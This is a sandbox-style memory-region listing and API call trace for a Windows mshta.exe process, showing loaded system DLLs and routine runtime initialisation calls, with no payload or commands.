region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 987
start_va = 0x640000
end_va = 0x640fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000640000"
filename = ""
Region:
id = 988
start_va = 0x650000
end_va = 0x650fff
entry_point = 0x650000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 989
start_va = 0x660000
end_va = 0x661fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000660000"
filename = ""
Region:
id = 990
start_va = 0x745f0000
end_va = 0x7478dfff
entry_point = 0x745f0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 991
start_va = 0x650000
end_va = 0x650fff
entry_point = 0x650000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 992
start_va = 0x670000
end_va = 0x671fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000670000"
filename = ""
Region:
id = 993
start_va = 0x650000
end_va = 0x650fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000650000"
filename = ""
Region:
id = 994
start_va = 0x920000
end_va = 0x921fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000920000"
filename = ""
Region:
id = 995
start_va = 0x76450000
end_va = 0x76484fff
entry_point = 0x76450000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")
Region:
id = 996
start_va = 0x77df0000
end_va = 0x77df5fff
entry_point = 0x77df0000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")
Region:
id = 997
start_va = 0x2750000
end_va = 0x28cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002750000"
filename = ""
Region:
id = 998
start_va = 0x74fe0000
end_va = 0x75023fff
entry_point = 0x74fe0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")
Region:
id = 999
start_va = 0x990000
end_va = 0xaaffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000990000"
filename = ""
Region:
id = 1000
start_va = 0x74fc0000
end_va = 0x74fdbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")
Region:
id = 1001
start_va = 0x74fb0000
end_va = 0x74fb6fff
entry_point = 0x74fb0000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll")
Region:
id = 1002
start_va = 0x1f70000
end_va = 0x1faffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001f70000"
filename = ""
Region:
id = 1003
start_va = 0x29c0000
end_va = 0x2abffff
entry_point = 0x0
region_type = private
name = "private_0x00000000029c0000"
filename = ""
Region:
id = 1004
start_va = 0x7efd5000
end_va = 0x7efd7fff
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 1005
start_va = 0x74570000
end_va = 0x745c1fff
entry_point = 0x74570000
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll")
Region:
id = 1006
start_va = 0x74f90000
end_va = 0x74fa4fff
entry_point = 0x74f90000
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll")
Region:
id = 1007
start_va = 0x74f80000
end_va = 0x74f8cfff
entry_point = 0x74f80000
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll")
Region:
id = 1008
start_va = 0x1fc0000
end_va = 0x1ffffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001fc0000"
filename = ""
Region:
id = 1009
start_va = 0x2b90000
end_va = 0x2c8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b90000"
filename = ""
Region:
id = 1010
start_va = 0x7efad000
end_va = 0x7efaffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 1011
start_va = 0x930000
end_va = 0x930fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 1012
start_va = 0x27c0000
end_va = 0x27fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 1013
start_va = 0x2890000
end_va = 0x28cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002890000"
filename = ""
Region:
id = 1014
start_va = 0x2d50000
end_va = 0x2e4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002d50000"
filename = ""
Region:
id = 1015
start_va = 0x7efaa000
end_va = 0x7efacfff
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Region:
id = 1016
start_va = 0x930000
end_va = 0x930fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000930000"
filename = ""
Region:
id = 1017
start_va = 0x74560000
end_va = 0x74565fff
entry_point = 0x74560000
region_type = mapped_file
name = "sensapi.dll"
filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll")
Region:
id = 1018
start_va = 0x2e50000
end_va = 0x2f4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002e50000"
filename = ""
Region:
id = 1019
start_va = 0x74550000
end_va = 0x7455ffff
entry_point = 0x74550000
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll")
Region:
id = 1020
start_va = 0x990000
end_va = 0x9cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000990000"
filename = ""
Region:
id = 1021
start_va = 0xa70000
end_va = 0xaaffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 1022
start_va = 0x990000
end_va = 0x9bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000990000"
filename = ""
Region:
id = 1023
start_va = 0x9c0000
end_va = 0x9cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000009c0000"
filename = ""
Region:
id = 1024
start_va = 0x9d0000
end_va = 0xa6ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 1025
start_va = 0x74540000
end_va = 0x74545fff
entry_point = 0x74540000
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")
Region:
id = 1026
start_va = 0x2830000
end_va = 0x286ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 1027
start_va = 0x30b0000
end_va = 0x31affff
entry_point = 0x0
region_type = private
name = "private_0x00000000030b0000"
filename = ""
Region:
id = 1028
start_va = 0x744e0000
end_va = 0x74539fff
entry_point = 0x744e0000
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll")
Region:
id = 1029
start_va = 0x7efa7000
end_va = 0x7efa9fff
entry_point = 0x0
region_type = private
name = "private_0x000000007efa7000"
filename = ""
Region:
id = 1030
start_va = 0x990000
end_va = 0x9affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000990000"
filename = ""
Region:
id = 1031
start_va = 0x9b0000
end_va = 0x9bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000009b0000"
filename = ""
Region:
id = 1032
start_va = 0x1ef0000
end_va = 0x1f2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ef0000"
filename = ""
Region:
id = 1033
start_va = 0x3200000
end_va = 0x32fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003200000"
filename = ""
Region:
id = 1034
start_va = 0x744a0000
end_va = 0x744dbfff
entry_point = 0x744a0000
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")
Region:
id = 1035
start_va = 0x7efa4000
end_va = 0x7efa6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007efa4000"
filename = ""
Region:
id = 1036
start_va = 0x750e0000
end_va = 0x750f5fff
entry_point = 0x750e0000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 1037
start_va = 0x750a0000
end_va = 0x750dafff
entry_point = 0x750a0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1038
start_va = 0x75350000
end_va = 0x7535dfff
entry_point = 0x75350000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll")
Region:
id = 1039
start_va = 0x74490000
end_va = 0x74494fff
entry_point = 0x74490000
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll")
Region:
id = 1040
start_va = 0x2970000
end_va = 0x29affff
entry_point = 0x0
region_type = private
name = "private_0x0000000002970000"
filename = ""
Region:
id = 1041
start_va = 0x3350000
end_va = 0x344ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003350000"
filename = ""
Region:
id = 1042
start_va = 0x75a00000
end_va = 0x75a02fff
entry_point = 0x75a00000
region_type = mapped_file
name = "normaliz.dll"
filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll")
Region:
id = 1043
start_va = 0x7efa1000
end_va = 0x7efa3fff
entry_point = 0x0
region_type = private
name = "private_0x000000007efa1000"
filename = ""
Region:
id = 1044
start_va = 0x2930000
end_va = 0x296ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002930000"
filename = ""
Region:
id = 1045
start_va = 0x3580000
end_va = 0x367ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003580000"
filename = ""
Region:
id = 1046
start_va = 0x74480000
end_va = 0x74487fff
entry_point = 0x74480000
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll")
Region:
id = 1047
start_va = 0x7ef9e000
end_va = 0x7efa0fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9e000"
filename = ""
Region:
id = 1048
start_va = 0x75190000
end_va = 0x751a6fff
entry_point = 0x75190000
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll")
Region:
id = 1049
start_va = 0x75cc0000
end_va = 0x75cecfff
entry_point = 0x75cc0000
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll")
Region:
id = 1220
start_va = 0x74440000
end_va = 0x74479fff
entry_point = 0x74440000
region_type = mapped_file
name = "schannel.dll"
filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll")
Region:
id = 1221
start_va = 0x74430000
end_va = 0x7443ffff
entry_point = 0x74430000
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\SysWOW64\\NapiNSP.dll" (normalized: "c:\\windows\\syswow64\\napinsp.dll")
Region:
id = 1222
start_va = 0x74410000
end_va = 0x74421fff
entry_point = 0x74410000
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\SysWOW64\\pnrpnsp.dll" (normalized: "c:\\windows\\syswow64\\pnrpnsp.dll")
Region:
id = 1223
start_va = 0x2ce0000
end_va = 0x2d1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ce0000"
filename = ""
Region:
id = 1224
start_va = 0x3460000
end_va = 0x355ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003460000"
filename = ""
Region:
id = 1225
start_va = 0x74400000
end_va = 0x74407fff
entry_point = 0x74400000
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\SysWOW64\\winrnr.dll" (normalized: "c:\\windows\\syswow64\\winrnr.dll")
Region:
id = 1226
start_va = 0x7ef9b000
end_va = 0x7ef9dfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9b000"
filename = ""
Region:
id = 1227
start_va = 0x743f0000
end_va = 0x743fafff
entry_point = 0x743f0000
region_type = mapped_file
name = "msimtf.dll"
filename = "\\Windows\\SysWOW64\\msimtf.dll" (normalized: "c:\\windows\\syswow64\\msimtf.dll")
Region:
id = 1228
start_va = 0x743e0000
end_va = 0x743e5fff
entry_point = 0x743e0000
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll")
Region:
id = 1229
start_va = 0x743a0000
end_va = 0x743d7fff
entry_point = 0x743a0000
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")
Region:
id = 1230
start_va = 0x9d0000
end_va = 0xa4ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 1231
start_va = 0x3010000
end_va = 0x304ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003010000"
filename = ""
Region:
id = 1232
start_va = 0x74360000
end_va = 0x7439bfff
entry_point = 0x74360000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll")
Region:
id = 1233
start_va = 0x940000
end_va = 0x940fff
entry_point = 0x940000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll")
Region:
id = 1234
start_va = 0x2b20000
end_va = 0x2b5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b20000"
filename = ""
Region:
id = 1235
start_va = 0x3800000
end_va = 0x38fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003800000"
filename = ""
Region:
id = 1236
start_va = 0x7ef98000
end_va = 0x7ef9afff
entry_point = 0x0
region_type = private
name = "private_0x000000007ef98000"
filename = ""
Region:
id = 1237
start_va = 0x74300000
end_va = 0x7435efff
entry_point = 0x74300000
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll")
Region:
id = 1238
start_va = 0x742f0000
end_va = 0x742f7fff
entry_point = 0x742f0000
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll")
Region:
id = 1239
start_va = 0xa50000
end_va = 0xa50fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a50000"
filename = ""
Region:
id = 1240
start_va = 0x1f30000
end_va = 0x1f68fff
entry_point = 0x1f30000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll")
Region:
id = 1241
start_va = 0xa50000
end_va = 0xa50fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a50000"
filename = ""
Region:
id = 1242
start_va = 0xa50000
end_va = 0xa50fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a50000"
filename = ""
Region:
id = 1243
start_va = 0x73870000
end_va = 0x742effff
entry_point = 0x73870000
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll")
Region:
id = 1244
start_va = 0xa50000
end_va = 0xa51fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a50000"
filename = ""
Region:
id = 1245
start_va = 0x73860000
end_va = 0x73867fff
entry_point = 0x73860000
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")
Region:
id = 1246
start_va = 0x73800000
end_va = 0x73816fff
entry_point = 0x73800000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 1247
start_va = 0x73820000
end_va = 0x73857fff
entry_point = 0x73820000
region_type = mapped_file
name = "ncrypt.dll"
filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll")
Region:
id = 1248
start_va = 0x3900000
end_va = 0x3cf2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003900000"
filename = ""
Region:
id = 1249
start_va = 0x737c0000
end_va = 0x737fcfff
entry_point = 0x737c0000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")
Region:
id = 1250
start_va = 0x3680000
end_va = 0x377ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003680000"
filename = ""
Region:
id = 1251
start_va = 0x737a0000
end_va = 0x737b5fff
entry_point = 0x737a0000
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll")
Region:
id = 1531
start_va = 0xab0000
end_va = 0xac0fff
entry_point = 0xab0000
region_type = mapped_file
name = "c_20127.nls"
filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls")
Region:
id = 1532
start_va = 0x73730000
end_va = 0x7379afff
entry_point = 0x73730000
region_type = mapped_file
name = "vbscript.dll"
filename = "\\Windows\\SysWOW64\\vbscript.dll" (normalized: "c:\\windows\\syswow64\\vbscript.dll")
Region:
id = 1533
start_va = 0x1f30000
end_va = 0x1f42fff
entry_point = 0x1f30000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 1534
start_va = 0x73630000
end_va = 0x73724fff
entry_point = 0x73630000
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll")
Region:
id = 1535
start_va = 0xa60000
end_va = 0xa61fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a60000"
filename = ""
Region:
id = 1536
start_va = 0x2750000
end_va = 0x278ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002750000"
filename = ""
Region:
id = 1537
start_va = 0x3da0000
end_va = 0x3e9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003da0000"
filename = ""
Region:
id = 1538
start_va = 0x735e0000
end_va = 0x7362bfff
entry_point = 0x735e0000
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")
Region:
id = 1539
start_va = 0x7ef95000
end_va = 0x7ef97fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ef95000"
filename = ""
Region:
id = 1540
start_va = 0x1ee0000
end_va = 0x1ee3fff
entry_point = 0x1ee0000
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 1541
start_va = 0x1f50000
end_va = 0x1f6ffff
entry_point = 0x1f50000
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db")
Region:
id = 1542
start_va = 0x75f20000
end_va = 0x75f31fff
entry_point = 0x75f20000
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll")
Region:
id = 1543
start_va = 0x76580000
end_va = 0x7671cfff
entry_point = 0x76580000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll")
Region:
id = 1544
start_va = 0x77750000
end_va = 0x77776fff
entry_point = 0x77750000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 1575
start_va = 0x1fb0000
end_va = 0x1fb0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001fb0000"
filename = ""
Region:
id = 1576
start_va = 0x2000000
end_va = 0x202ffff
entry_point = 0x2000000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db")
Region:
id = 1577
start_va = 0x2790000
end_va = 0x2793fff
entry_point = 0x2790000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1578
start_va = 0x2f50000
end_va = 0x2fb5fff
entry_point = 0x2f50000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 1579
start_va = 0x37b0000
end_va = 0x37effff
entry_point = 0x0
region_type = private
name = "private_0x00000000037b0000"
filename = ""
Region:
id = 1580
start_va = 0x3ea0000
end_va = 0x3f9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003ea0000"
filename = ""
Region:
id = 1581
start_va = 0x7ef92000
end_va = 0x7ef94fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ef92000"
filename = ""
Region:
id = 1582
start_va = 0x3d00000
end_va = 0x3d6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003d00000"
filename = ""
Region:
id = 1583
start_va = 0x3fa0000
end_va = 0x48cffff
entry_point = 0x3fa0000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Thread:
id = 73
os_tid = 0xbf4
[0068.601] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33fbdc | out: lpSystemTimeAsFileTime=0x33fbdc*(dwLowDateTime=0xbfc149e0, dwHighDateTime=0x1d48634))
[0068.602] GetCurrentProcessId () returned 0xbf0
[0068.602] GetCurrentThreadId () returned 0xbf4
[0068.602] GetTickCount () returned 0x20962
[0068.602] QueryPerformanceCounter (in: lpPerformanceCount=0x33fbd4 | out: lpPerformanceCount=0x33fbd4*=1814761200000) returned 1
[0068.602] GetModuleHandleA (lpModuleName=0x0) returned 0x680000
[0068.602] GetStartupInfoA (in: lpStartupInfo=0x33fae8 | out: lpStartupInfo=0x33fae8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SysWOW64\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0068.602] GetVersionExA (in: lpVersionInformation=0x33fb38*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x33fb38*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0068.602] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000
[0068.603] GetProcAddress (hModule=0x76220000, lpProcName="FlsAlloc") returned 0x76234f2b
[0068.603] GetProcAddress (hModule=0x76220000, lpProcName="FlsGetValue") returned 0x76231252
[0068.603] GetProcAddress (hModule=0x76220000, lpProcName="FlsSetValue") returned 0x76234208
[0068.603] GetProcAddress (hModule=0x76220000, lpProcName="FlsFree") returned 0x7623359f
[0068.603] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.603] GetProcAddress (hModule=0x75f40000, lpProcName="EncodePointer") returned 0x77e60fcb
[0068.603] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.603] GetProcAddress (hModule=0x75f40000, lpProcName="EncodePointer") returned 0x77e60fcb
[0068.603] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.603] GetProcAddress (hModule=0x75f40000, lpProcName="EncodePointer") returned 0x77e60fcb
[0068.603] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.604] GetProcAddress (hModule=0x75f40000, lpProcName="EncodePointer") returned 0x77e60fcb
[0068.604] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.604] GetProcAddress (hModule=0x75f40000, lpProcName="EncodePointer") returned 0x77e60fcb
[0068.604] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.604] GetProcAddress (hModule=0x75f40000, lpProcName="EncodePointer") returned 0x77e60fcb
[0068.604] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.604] GetProcAddress (hModule=0x75f40000, lpProcName="EncodePointer") returned 0x77e60fcb
[0068.604] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.604] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.604] GetModuleHandleW (lpModuleName="kernelbase.dll") returned 0x75f40000
[0068.605] GetProcAddress (hModule=0x75f40000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75f5004f
[0068.605] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.605] GetProcAddress (hModule=0x75f40000, lpProcName="EncodePointer") returned 0x77e60fcb
[0068.606] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.606] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.606] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.606] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.606] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.607] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.607] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.607] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.607] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.607] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.607] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.607] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.607] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.607] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.608] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
